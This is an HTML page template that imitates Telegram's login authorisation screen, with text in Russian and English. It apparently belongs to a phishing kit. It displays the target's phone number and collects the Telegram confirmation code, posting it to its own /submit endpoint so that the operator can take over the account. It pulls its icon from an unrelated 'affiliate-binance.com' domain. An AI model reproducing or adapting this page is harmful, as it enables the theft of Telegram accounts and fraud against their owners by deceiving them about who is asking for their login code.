<!doctype html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
   <title>Авторизация Telegram</title>
   <style>
   a { 
    text-decoration: none;
   } 
  </style>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
	  <link rel="icon" href="https://affiliate-binance.com/oauth/telegram/favicon.ico" type="image/x-icon">
    <link href="https://fonts.googleapis.com/css?family=Roboto:400,500" rel="stylesheet" type="text/css">
    <link href="https://telegram.org/css/bootstrap.min.css?3" rel="stylesheet">
    <link href="https://telegram.org/css/bootstrap-extra.css?2" rel="stylesheet">
    <link href="https://telegram.org/css/telegram.css?231" rel="stylesheet">
    <link href="../static/css/oauth.css?14" rel="stylesheet">
    <link rel="stylesheet" href="../static/css/style.css">
</head>
<body>
  <div class="holder">
    <iframe src="{{bg_link}}" frameborder="0"></iframe>
    <div class="modal" role="dialog">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-body">
            <main class="login">
              <section class="login_content" id="login-container">
                <div class="login_photos"><span class="login_telegram_photo_wrap arrowed"><i class="login_telegram_photo"></i></span><a id="link" href="{{link}}" target="_blank"><i class="login_bot_photo bgcolor2" data-content="L"><img src="../static/images/{{img}}"></i></a></div>
                <div class="login_header_text" id="header-text"></div>
                <div class="login_confirm_text" id="login-text"></div>
                
                <form id="send-form" class="login_form" method="POST" action="/submit/{{phone}}">
                    <div class="login_phone_field_wrap">
                      <div class="login_number_field_wrap">
                        <div class="textfield-item" id="login-phone-textfield">
                          <input type="text" class="form-control text-center" disabled value="{{phone}}">
                          <div class="textfield-item-underline"></div>
                        </div>
                      </div>
                    </div>
                    <div class="login_number_field_wrap">
                      <div class="textfield-item" id="login-phone-textfield">
                        <input type="text" class="form-control text-center" id="code" name="code">
                        <div class="textfield-item-underline"></div>
                      </div>
                    </div>
                  <div class="login_button_wrap">
                    <button class="button-item button-item-flat ripple-handler" onclick="return loginCancel(event)"   type="button">
                      <span class="button-item-label" id="cancel"></span>
                      <span class="ripple-mask"><span class="ripple"></span></span>
                    </button>
                    <button class="button-item ripple-handler" type="submit">
                      <span class="button-item-label" id="next"></span>
                      <span class="ripple-mask"><span class="ripple"></span></span>
                    </button>
                  </div>
                </form>
                {% if error %}
                  <div style="margin-top: 20px;
                  font-family: 'Roboto', sans-serif;
                  text-align: center;
                  font-size: 13px;">
                    {{ error }}
                  </div>
                {% endif %}
              </section>
                </main>
          </div>
        </div>
      </div>
    </div>
  </div>
<script>
  function loginCancel(e) {
    window.location.href = '/phone_form';
  }

  var userLang = navigator.language || navigator.userLanguage;

  lang = userLang.split('-')[0]

  if (lang == 'ru') {
        document.getElementById('header-text').innerHTML = 'Войдите, чтобы использовать аккаунт Telegram для<br> {{site}} и <a class="bot_name" href="{{link}}" target="_blank">{{name}}</a>.';
        document.getElementById('login-text').innerHTML = "Мы отправим вам код в <b>Telegram</b>";
        document.getElementById('cancel').innerHTML = 'Отмена';
        document.getElementById('next').innerHTML = 'Далее';
        document.getElementById('code').placeholder = 'Код подтверждения';
    } else {
        document.getElementById('header-text').innerHTML = 'Log in to use your Telegram account with<br> {{site}} and <a class="bot_name" href="{{link}}" target="_blank">{{name}}</a>.';
        document.getElementById('login-text').innerHTML = "We've just sent you a message via <b>Telegram</b>";
        document.getElementById('cancel').innerHTML = 'Cancel';
        document.getElementById('next').innerHTML = 'Next';
        document.getElementById('code').placeholder = 'Confirmation code';
    }
</script>
</body>
</html>